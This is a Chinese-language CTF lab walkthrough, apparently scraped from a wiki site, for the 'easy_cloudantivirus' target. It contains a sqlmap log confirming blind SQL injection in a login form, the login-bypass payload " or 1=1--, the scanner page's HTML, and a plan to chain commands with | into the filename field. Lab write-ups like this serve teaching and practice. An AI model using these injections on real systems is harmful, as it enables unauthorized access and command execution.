靶机: easy_cloudantivirus( 二 ) _生活百科

┌──(kali?kali)-[~/workspace]└─$ sqlmap -r testsql.txt -f --level 4 --risk 3_____H_____ ___[']_____ ___ ___{1.6.10#stable}|_ -| . [(]| .'| . ||___|_[(]_|_|_|__,|_||_|V...|_|https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:18:43 /2022-10-23/[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'[15:18:43] [INFO] testing connection to the target URL[15:18:44] [INFO] testing if the target URL content is stable[15:18:44] [INFO] target URL content is stable[15:18:44] [INFO] testing if POST parameter 'password' is dynamic[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Yfor the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y[15:19:14] [INFO] testing 'Generic inline queries'[15:19:14] [INFO] testing 'SQLite inline queries'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

从中可以看出存在注入点，并且 DBMS 可能是 SQLite
并且从 [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 可以看出注入类型 OR boolean-based

构造 SQL 注入语句，已知注入类型 OR boolean-based 可以尝试比较通用的语句 " or 1=1--做为页面 http://192.168.56.109:8080/ 中表单的 password 值进行提交表单

到目前为止，我们成功登录 http://192.168.56.109:8080/scan 页面，通过简单的探索发现此页面是这个 Web 应用的后台管理页面，其中存在数据提交，但通过关键词 Try scanning some of these files with our scanner! 知道传入的数据是被某种程序进行查杀，更多的是涉及 shell 中执行

<html><body><h1>Cloud Anti-Virus Scanner!</h1><h3>Try scanning some of these files with our scanner!</h3><pre>total 4756-rwxr-xr-x 1 scanner scanner 1113504 Oct 212018 bash-rwxr-xr-x 1 scanner scanner34888 Oct 212018 bzip2-rwxr-xr-x 1 scanner scanner35064 Oct 212018 cat-rw-rw-r-- 1 scanner scanner68 Oct 212018 eicar-rw-rw-r-- 1 scanner scanner5 Oct 212018 hello-rwxr-xr-x 1 scanner scanner35312 Oct 212018 netcat-rwxr-xr-x 1 scanner scanner 3633560 Oct 212018 python</pre><form action="/output" method="POST"><input type="filename" name="filename" placeholder="File Name"><input type="submit" value="https://www.huyubaike.com/biancheng/Scan!"></form></body></html>

我们可以尝试使用 | 管道进行命令串联，改变回返的数据内容，并夹杂我们想要的信息